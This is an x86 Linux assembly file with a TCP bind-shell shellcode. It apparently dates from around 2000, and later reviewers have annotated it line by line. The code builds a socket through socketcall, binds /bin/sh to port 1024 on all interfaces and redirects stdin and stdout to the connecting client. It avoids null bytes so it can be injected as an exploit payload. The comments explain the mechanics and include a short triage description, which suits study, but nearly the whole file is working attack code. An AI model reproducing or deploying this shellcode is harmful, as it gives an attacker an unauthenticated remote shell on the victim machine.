# binds a shell on port 1024 - by laqqah
# see ya at hultsfred & roskilde festivals 2000.
# din mamma dr en brevleda!

.global _start
# ---------------------------------------------------------------------
# _start: TCP bind shell for 32-bit x86 Linux (AT&T syntax, int $0x80).
#
# Flow: socket -> bind -> listen -> accept, all issued through the
# socketcall multiplexer (syscall 102, sub-call number in %ebx), then
# dup2(conn, 1), dup2(conn, 0) and execve of "/bin/sh".
#
# Register roles:
#   %esi  constant 102 (socketcall), copied into %eax before each call
#   %ebx  socketcall sub-call number, advanced with inc between calls
#   %ecx  pointer to the argument block on the stack
#   %edi  pointer to the sockaddr built on the stack
#
# No syscall return value is checked, and accept runs once with no fork,
# so the process handles a single connection and is then replaced by the
# shell.
#
# Host-side picture for triage: a listener on TCP port 1024 bound to
# INADDR_ANY, and after a client connects a /bin/sh process whose fds 0
# and 1 are that socket (fd 2 is never redirected here).
#
# NOTE(review): immediates are loaded with xor + movb and the string has
# no terminator in the file, presumably to keep zero bytes out of the
# encoding.
# ---------------------------------------------------------------------
_start:
xor %eax, %eax
movb $102, %al
mov %eax, %esi          # esi = 102 = socketcall, kept for every call below

# Build the socket() argument block: pushed last-to-first so memory
# reads {2, 1, 0} from %esp upward.
xor %eax, %eax
push %eax               # protocol = 0 (original comment said IPPROTO_TCP; the value pushed is 0)
inc %eax
push %eax               # type = 1 (SOCK_STREAM)
inc %eax
push %eax               # domain = 2 (AF_INET)
mov %esp, %ecx          # ecx -> {2, 1, 0}, argument block for sys_socket

# Build the sockaddr on the stack: two dwords, address then family/port.
xor %ebx, %ebx
xor %edx, %edx
movb $16, %dl           # edx = 16, the address length passed to bind
push %ebx               # sin_addr = 0 (INADDR_ANY)

# eax is still 2 and CF is clear (last flag-setting op was the xor
# above), so the rotate leaves eax = 0x00040000. Stored little-endian
# that is family bytes 00 00 and port bytes 04 00, i.e. port 1024 in
# network order.
rcl $17, %eax           # PORT = 1024, FAMILY = 0 (author's note: family doesn't matter)
push %eax

mov %esp, %edi          # edi -> the 8 bytes just pushed (family/port, address)
push %edx               # sizeof(struct sockaddr_in) = 16
push %edi               # (struct sockaddr_in *)

# sys_socket
mov %esi, %eax
inc %ebx                # ebx = 1 (SYS_SOCKET)
int $0x80
push %eax               # socket fd; stack top is now {fd, addr, 16}

# sys_bind
mov %esi, %eax
inc %ebx                # ebx = 2 (SYS_BIND)
mov %esp, %ecx          # ecx -> {fd, addr, 16}
int $0x80

# sys_listen
# ecx is not reloaded, so the second word of the bind block (the
# sockaddr pointer) is what the kernel reads as the backlog.
mov %esi, %eax
inc %ebx
inc %ebx                # ebx = 4 (SYS_LISTEN); 3 is skipped
int $0x80

# sys_accept
# Reuses the same {fd, addr, 16} block unchanged.
mov %esi, %eax
inc %ebx                # ebx = 5 (SYS_ACCEPT)
int $0x80
push %eax               # accepted socket

# dup2
# Only %al is written before each int $0x80, so the syscall number is
# correct only if the upper bytes of eax are already zero, which holds
# when the previous call returned a small non-negative value.
pop %ebx                # ebx = accepted socket (oldfd for both dup2 calls)
xor %ecx, %ecx
inc %ecx                # ecx = 1
movb $63, %al           # 63 = dup2
int $0x80               # dup2(conn, 1): stdout
movb $63, %al
dec %ecx                # ecx = 0
int $0x80               # dup2(conn, 0): stdin; returns 0 on success

# exec shell
# jmp/call/pop: the call at label 1 pushes the address of the bytes that
# follow it (the string), and label 2 pops that address into ebx.
jmp 1f
2:
pop %ebx        # "/bin/sh"
push %eax               # eax is 0 if the last dup2 succeeded: NULL terminator word
movb %al, 7(%ebx)       # write the string terminator in place; the target memory must be writable
movb $11, %al           # 11 = execve
mov %esp, %edx          # edx (envp) -> {NULL}
push %ebx
mov %esp, %ecx          # ecx (argv) -> {"/bin/sh", NULL}
int $0x80

# Reached only if execve returns. With SAFE defined the process exits
# (syscall 1, status is whatever ebx holds); without it execution falls
# through to the call at label 1 and re-enters label 2.
.ifdef SAFE
xor %eax, %eax
inc %eax
int $0x80
.endif  # SAFE

1:
call 2b
.ascii "/bin/sh"
